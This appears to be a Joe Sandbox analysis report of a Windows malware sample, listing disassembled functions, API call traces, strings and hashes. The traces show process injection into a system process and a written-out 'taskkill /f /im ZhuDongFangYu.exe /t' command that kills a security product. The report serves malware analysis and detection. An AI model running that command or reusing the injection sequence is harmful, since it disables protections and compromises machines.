Associated: 00000007.00000002.2041780728.0000000000411000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041817144.0000000000414000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041856155.000000000041A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041889922.000000000041B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041925085.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041960628.0000000000422000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041998511.0000000000428000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042034583.0000000000429000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042070942.000000000042E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042109164.0000000000430000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042142445.0000000000436000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042178619.0000000000437000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042214148.000000000043C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042250391.000000000043E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042287121.000000000043F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042322483.0000000000444000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042357404.0000000000445000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042391202.000000000044A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042425715.000000000044C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042459631.0000000000452000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042494427.0000000000453000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042529261.0000000000458000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042564892.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042599424.000000000045B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042632509.0000000000460000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042665134.0000000000461000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042698465.0000000000466000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042729811.0000000000468000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042768818.0000000000469000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042801538.000000000046E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042833900.000000000046F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042866159.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042900352.0000000000476000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042933732.0000000000477000.00000080.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_hrl97AF.jbxd

Similarity

API ID: Handle$AllocCloseModuleVersionVirtual
String ID: "'3$\BaseNamedObjects\rnxtVt$\BaseNamedObjects\rnxtVt$csrs
API String ID: 3017432202-1649617
Opcode ID: 7ac06902b526b320f932b07ff4c1ff8a544c7f655dd6fa859a553a943bad6a44
Instruction ID: d3e89109dc24bbf886ea0b6f2b303f9048f19f5640d296cbfa9f7c9e66786fe5
Opcode Fuzzy Hash: 7ac06902b526b320f932b07ff4c1ff8a544c7f655dd6fa859a553a943bad6a44
Instruction Fuzzy Hash: 21B1AF31A14209FBEB219F20CC09BEA3BBDEF04706F14806AE90D9E182C7F59F458759

Function 009B0442 Relevance: 35.3, APIs: 16, Strings: 4, Instructions: 281
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(00000000), ref: 009B04CD
GetVersion.KERNEL32 ref: 009B050F
VirtualAlloc.KERNEL32(00000000,000065A4,08001000,00000040), ref: 009B0537
CloseHandle.KERNELBASE(?), ref: 009B05BC

Strings

\BaseNamedObjects\rnxtVt, xrefs: 009B0718, 009B0735, 009B0743
\BaseNamedObjects\rnxtVt, xrefs: 009B0717
csrs, xrefs: 009B0835
"'3, xrefs: 009B0603

Memory Dump Source

Source File: 00000007.00000002.2043369977.00000000009B0000.00000040.10000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_9b0000_hrl97AF.jbxd

Similarity

API ID: Handle$AllocCloseModuleVersionVirtual
String ID: "'3$\BaseNamedObjects\rnxtVt$\BaseNamedObjects\rnxtVt$csrs
API String ID: 3017432202-1649617
Opcode ID: 7ac06902b526b320f932b07ff4c1ff8a544c7f655dd6fa859a553a943bad6a44
Instruction ID: 4e229efc3d520e97deb4388f8938704670b8addbc78b96a4f55b785fb9f86adf
Opcode Fuzzy Hash: 7ac06902b526b320f932b07ff4c1ff8a544c7f655dd6fa859a553a943bad6a44
Instruction Fuzzy Hash: D4B17631604249FBEB619F21C94ABEE3BADAF84722F100028F9089E591CBF19F55CB55

Function 0047D309 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 184
stringnativeprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CloseHandle.KERNEL32(?), ref: 0047D2C4
GetModuleHandleA.KERNEL32(0047D303), ref: 0047D309
lstrcpyW.KERNEL32(\BaseNamedObjects\rnxtVt,\BaseNamedObjects\rnxtVt,?,?,?,?), ref: 0047D421
lstrcpyW.KERNEL32(\BaseNamedObjects\rnxtVt,?), ref: 0047D43E
lstrcatW.KERNEL32(\BaseNamedObjects\rnxtVt,\rnxtVt), ref: 0047D44C
NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,000065A4,00000000,?,00000002,00000000,00000040), ref: 0047D47C
NtOpenProcessToken.NTDLL(000000FF,00000020), ref: 0047D497
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,000065A4,00000000,?,00000002,00000000,00000040,00000000,000065A4), ref: 0047D4DA
Process32First.KERNEL32 ref: 0047D4ED
Process32Next.KERNEL32 ref: 0047D4FE
OpenProcess.KERNEL32(0000002A,00000000,?,?,?,?,?,?,00000002,00000000,00000040,00000000,000065A4), ref: 0047D516
CreateRemoteThread.KERNEL32(?,00000000,00000000,-00002FC3,00000002,00000000), ref: 0047D553
CloseHandle.KERNEL32(?,?,?,?,?,?,00000002,00000000,00000040,00000000,000065A4), ref: 0047D56E
CloseHandle.KERNEL32 ref: 0047D57D

Strings

csrs, xrefs: 0047D53D
\BaseNamedObjects\rnxtVt, xrefs: 0047D420, 0047D43D, 0047D44B
\BaseNamedObjects\rnxtVt, xrefs: 0047D41F

Memory Dump Source

Source File: 00000007.00000002.2042970923.000000000047C000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2041535304.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041574826.0000000000401000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041611547.0000000000406000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041707592.0000000000408000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041744590.000000000040A000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041780728.0000000000411000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041817144.0000000000414000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041856155.000000000041A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041889922.000000000041B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041925085.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041960628.0000000000422000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041998511.0000000000428000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042034583.0000000000429000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042070942.000000000042E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042109164.0000000000430000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042142445.0000000000436000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042178619.0000000000437000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042214148.000000000043C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042250391.000000000043E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042287121.000000000043F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042322483.0000000000444000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042357404.0000000000445000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042391202.000000000044A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042425715.000000000044C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042459631.0000000000452000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042494427.0000000000453000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042529261.0000000000458000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042564892.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042599424.000000000045B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042632509.0000000000460000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042665134.0000000000461000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042698465.0000000000466000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042729811.0000000000468000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042768818.0000000000469000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042801538.000000000046E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042833900.000000000046F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042866159.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042900352.0000000000476000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042933732.0000000000477000.00000080.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_hrl97AF.jbxd

Similarity

API ID: Handle$Close$CreateOpenProcessProcess32lstrcpy$FirstModuleNextRemoteSectionSnapshotThreadTokenToolhelp32Viewlstrcat
String ID: \BaseNamedObjects\rnxtVt$\BaseNamedObjects\rnxtVt$csrs
API String ID: 1545766225-676502312
Opcode ID: dcfbda88c1452e16d26fd376d2d59b1fd8c40ae983f26fda525faf50f22b961d
Instruction ID: fcdb6bbfc0312b4f8506c2a26003359644726e6987a875f92ecc1c07d60a53b0
Opcode Fuzzy Hash: dcfbda88c1452e16d26fd376d2d59b1fd8c40ae983f26fda525faf50f22b961d
Instruction Fuzzy Hash: 7D61BA31A14109FFDB219F50C849BEE3B7DEF45316F14806AE80D9E192C7B99F0A8B59

Function 009B0601 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 184
stringnativeprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CloseHandle.KERNELBASE(?), ref: 009B05BC
GetModuleHandleA.KERNEL32(009B05FB), ref: 009B0601
lstrcpyW.KERNEL32(\BaseNamedObjects\rnxtVt,\BaseNamedObjects\rnxtVt,?,?,?,?), ref: 009B0719
lstrcpyW.KERNEL32(\BaseNamedObjects\rnxtVt,?), ref: 009B0736
lstrcatW.KERNEL32(\BaseNamedObjects\rnxtVt,\rnxtVt), ref: 009B0744
NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,000065A4,00000000,?,00000002,00000000,00000040), ref: 009B0774
NtOpenProcessToken.NTDLL(000000FF,00000020), ref: 009B078F
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,000065A4,00000000,?,00000002,00000000,00000040,00000000,000065A4), ref: 009B07D2
Process32First.KERNEL32 ref: 009B07E5
Process32Next.KERNEL32 ref: 009B07F6
OpenProcess.KERNEL32(0000002A,00000000,?,?,?,?,?,?,00000002,00000000,00000040,00000000,000065A4), ref: 009B080E
CreateRemoteThread.KERNELBASE(?,00000000,00000000,-00002FC3,00000002,00000000), ref: 009B084B
CloseHandle.KERNELBASE(?,?,?,?,?,?,00000002,00000000,00000040,00000000,000065A4), ref: 009B0866
CloseHandle.KERNEL32 ref: 009B0875

Strings

\BaseNamedObjects\rnxtVt, xrefs: 009B0718, 009B0735, 009B0743
\BaseNamedObjects\rnxtVt, xrefs: 009B0717
csrs, xrefs: 009B0835

Memory Dump Source

Source File: 00000007.00000002.2043369977.00000000009B0000.00000040.10000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_9b0000_hrl97AF.jbxd

Similarity

API ID: Handle$Close$CreateOpenProcessProcess32lstrcpy$FirstModuleNextRemoteSectionSnapshotThreadTokenToolhelp32Viewlstrcat
String ID: \BaseNamedObjects\rnxtVt$\BaseNamedObjects\rnxtVt$csrs
API String ID: 1545766225-676502312
Opcode ID: dcfbda88c1452e16d26fd376d2d59b1fd8c40ae983f26fda525faf50f22b961d
Instruction ID: 45f8643d4050a3f40740ce4add8d88ec45bb4b1fa2d238a3ddddab4416af18a2
Opcode Fuzzy Hash: dcfbda88c1452e16d26fd376d2d59b1fd8c40ae983f26fda525faf50f22b961d
Instruction Fuzzy Hash: 96619731604209FBDB659F11C949BFE3B6EEF89322F504028F8099E591CBB1AF058B95

Function 0047F12D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46
stringnativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcpyW.KERNEL32(?,\BaseNamedObjects\rnxtVt), ref: 0047F139
lstrlenW.KERNEL32(?), ref: 0047F140
NtCreateSection.NTDLL(?,0000000E,?,?,00000040,08000000,00000000), ref: 0047F195

Strings

\BaseNamedObjects\rnxtVt, xrefs: 0047F137

Memory Dump Source

Source File: 00000007.00000002.2042970923.000000000047C000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2041535304.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041574826.0000000000401000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041611547.0000000000406000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041707592.0000000000408000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041744590.000000000040A000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041780728.0000000000411000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041817144.0000000000414000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041856155.000000000041A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041889922.000000000041B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041925085.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041960628.0000000000422000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041998511.0000000000428000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042034583.0000000000429000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042070942.000000000042E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042109164.0000000000430000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042142445.0000000000436000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042178619.0000000000437000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042214148.000000000043C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042250391.000000000043E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042287121.000000000043F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042322483.0000000000444000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042357404.0000000000445000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042391202.000000000044A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042425715.000000000044C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042459631.0000000000452000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042494427.0000000000453000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042529261.0000000000458000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042564892.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042599424.000000000045B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042632509.0000000000460000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042665134.0000000000461000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042698465.0000000000466000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042729811.0000000000468000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042768818.0000000000469000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042801538.000000000046E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042833900.000000000046F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042866159.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042900352.0000000000476000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042933732.0000000000477000.00000080.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_hrl97AF.jbxd

Similarity

API ID: CreateSectionlstrcpylstrlen
String ID: \BaseNamedObjects\rnxtVt
API String ID: 2597515329-2100028039
Opcode ID: 20bdb40ffb474c402f65f73e914af13d443f92d4dff509730c57e181749428e4
Instruction ID: 236b27dbcf50c3b36ce75338e0eff8c7e58860e6019f247f95c002ae3b581bdf
Opcode Fuzzy Hash: 20bdb40ffb474c402f65f73e914af13d443f92d4dff509730c57e181749428e4
Instruction Fuzzy Hash: B00181B0790304BAF7305B2ACC8BF5E3D68DF81B51F548558F605AE1C4D5F99A0487AA

Function 009B24A6 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtOpenSection.NTDLL(?,0000000E), ref: 009B24D5

Strings

\BaseNamedObjects\rnxtVt, xrefs: 009B24C2

Memory Dump Source

Source File: 00000007.00000002.2043369977.00000000009B0000.00000040.10000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_9b0000_hrl97AF.jbxd

Similarity

API ID: OpenSection
String ID: \BaseNamedObjects\rnxtVt
API String ID: 1950954290-2100028039
Opcode ID: 01bc40aaccc0e12f94ebcffc641123895db33c2b7787041d8d9fd48dce060fde
Instruction ID: 3af93ba349bfc42ef742b5b28717abad19c90c039107910871d63db4ec892b88
Opcode Fuzzy Hash: 01bc40aaccc0e12f94ebcffc641123895db33c2b7787041d8d9fd48dce060fde
Instruction Fuzzy Hash: 88E0D8F13505053BFB585B1ACC07FB7211CDB80601F08C504F918D8180E5F6DF504674

Function 009B24EB Relevance: 3.1, APIs: 2, Instructions: 66
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 009B24A6: NtOpenSection.NTDLL(?,0000000E), ref: 009B24D5

NtMapViewOfSection.NTDLL(00000000,?,?,00000000,0000A5A4,00000000,?,00000002,00100000,00000040), ref: 009B251B
CloseHandle.KERNELBASE(00000000,0000A5A4,00000000,?,00000002,00100000,00000040,00000000,0000A5A4,00000000,?,009B081E), ref: 009B2523

Memory Dump Source

Source File: 00000007.00000002.2043369977.00000000009B0000.00000040.10000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_9b0000_hrl97AF.jbxd

Similarity

API ID: Section$CloseHandleOpenView
String ID:
API String ID: 2731707328-0
Opcode ID: d57de25e2a9e0870f79673598bd885887cfcbdd2de40fd78df44cfc9adbced58
Instruction ID: 0ef0e5a9f0ea872d1116677e812433304fb4d952543c798f3825385127d7bbe6
Opcode Fuzzy Hash: d57de25e2a9e0870f79673598bd885887cfcbdd2de40fd78df44cfc9adbced58
Instruction Fuzzy Hash: F1211A3034060AABDB34EB25CD96FEA736DEF81B21F040118F8089E495DBB4AF06CA55

Function 009B1399 Relevance: 3.0, APIs: 2, Instructions: 38
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LookupPrivilegeValueA.ADVAPI32(00000000,?), ref: 009B13D1
NtAdjustPrivilegesToken.NTDLL(?,00000000,?,00000000,00000000,00000000), ref: 009B13E1

Memory Dump Source

Source File: 00000007.00000002.2043369977.00000000009B0000.00000040.10000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_9b0000_hrl97AF.jbxd

Similarity

API ID: AdjustLookupPrivilegePrivilegesTokenValue
String ID:
API String ID: 3615134276-0
Opcode ID: 06cb91745a521b86393166955c5c3afe83ac66ea4f770f9a12dd5b551f424793
Instruction ID: c1c1ab654349933eb8818b114bb595f6400d348302ddc4a0bc7520d30974f20a
Opcode Fuzzy Hash: 06cb91745a521b86393166955c5c3afe83ac66ea4f770f9a12dd5b551f424793
Instruction Fuzzy Hash: E4F02732542420BBD7201F42CC8EED77F28EF537A0F044456F4484E152C2A28BA5D3F4

Function 009B23EE Relevance: 3.0, APIs: 2, Instructions: 25
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL(?,?,?,00000040), ref: 009B2412
NtWriteVirtualMemory.NTDLL ref: 009B241B

Memory Dump Source

Source File: 00000007.00000002.2043369977.00000000009B0000.00000040.10000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_9b0000_hrl97AF.jbxd

Similarity

API ID: MemoryVirtual$ProtectWrite
String ID:
API String ID: 151266762-0
Opcode ID: 534548baa2052e911e8d62c03dc4c028d0ed02b2351596322006dfeadd0b54f5
Instruction ID: c38bda1e3a101e2fdd3f8b0b268324223328f149a1f706d2aad4996337be3d8a
Opcode Fuzzy Hash: 534548baa2052e911e8d62c03dc4c028d0ed02b2351596322006dfeadd0b54f5
Instruction Fuzzy Hash: 69E0E2A07502007FFA185A299C5BF7B391DDB80B41F810208FA0A98180FAE26F1486BA

Function 009B13C1 Relevance: 3.0, APIs: 2, Instructions: 22
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LookupPrivilegeValueA.ADVAPI32(00000000,?), ref: 009B13D1
NtAdjustPrivilegesToken.NTDLL(?,00000000,?,00000000,00000000,00000000), ref: 009B13E1

Memory Dump Source

Source File: 00000007.00000002.2043369977.00000000009B0000.00000040.10000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_9b0000_hrl97AF.jbxd

Similarity

API ID: AdjustLookupPrivilegePrivilegesTokenValue
String ID:
API String ID: 3615134276-0
Opcode ID: 03410179fabc8902f2c006e492dd7336ccf3c81071a106955ee4cf51594df4cc
Instruction ID: 2757d4dcf4212f89d011a90f07cb8bff029887feb5f377fd6fe999df64044c2d
Opcode Fuzzy Hash: 03410179fabc8902f2c006e492dd7336ccf3c81071a106955ee4cf51594df4cc
Instruction Fuzzy Hash: 8AD09E316420347BD6711E168C0EEDB7E1DEF57BB1F014045F90C99192C5A28EA1C7F5

Function 004029E0 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 88
windowprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

#4710.MFC42 ref: 004029EA
SendMessageA.USER32(?,00000080,00000001,?), ref: 00402A04
SendMessageA.USER32(?,00000080,00000000,?), ref: 00402A15
SetWindowLongA.USER32(?,000000EC,00000080), ref: 00402A2A
#6197.MFC42(00000000,0000009C,0000009C,00000000,00000000,00000001), ref: 00402A3E
WinExec.KERNEL32(taskkill /f /im ZhuDongFangYu.exe /t,00000000), ref: 00402A5D

Part of subcall function 00402B40: LoadLibraryA.KERNEL32(kernel32.dll,00000047), ref: 00402BF5
Part of subcall function 00402B40: GetProcAddress.KERNEL32(00000000), ref: 00402BFC
Part of subcall function 00402B40: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00402C1F
Part of subcall function 00402B40: strncmp.MSVCRT ref: 00402C44

ExitProcess.KERNEL32 ref: 00402AC4

Strings

|7@, xrefs: 00402A8E
100200, xrefs: 00402A9D
100200, xrefs: 00402A71, 00402AA7
taskkill /f /im ZhuDongFangYu.exe /t, xrefs: 00402A58
100200, xrefs: 00402AA2

Memory Dump Source

Source File: 00000007.00000002.2041574826.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2041535304.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041611547.0000000000406000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041707592.0000000000408000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041744590.000000000040A000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041780728.0000000000411000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041817144.0000000000414000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041856155.000000000041A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041889922.000000000041B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041925085.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041960628.0000000000422000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041998511.0000000000428000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042034583.0000000000429000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042070942.000000000042E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042109164.0000000000430000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042142445.0000000000436000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042178619.0000000000437000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042214148.000000000043C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042250391.000000000043E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042287121.000000000043F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042322483.0000000000444000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042357404.0000000000445000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042391202.000000000044A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042425715.000000000044C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042459631.0000000000452000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042494427.0000000000453000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042529261.0000000000458000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042564892.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042599424.000000000045B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042632509.0000000000460000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042665134.0000000000461000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042698465.0000000000466000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042729811.0000000000468000.00000040.00000001.01000000.00000005.sdmpDownload File
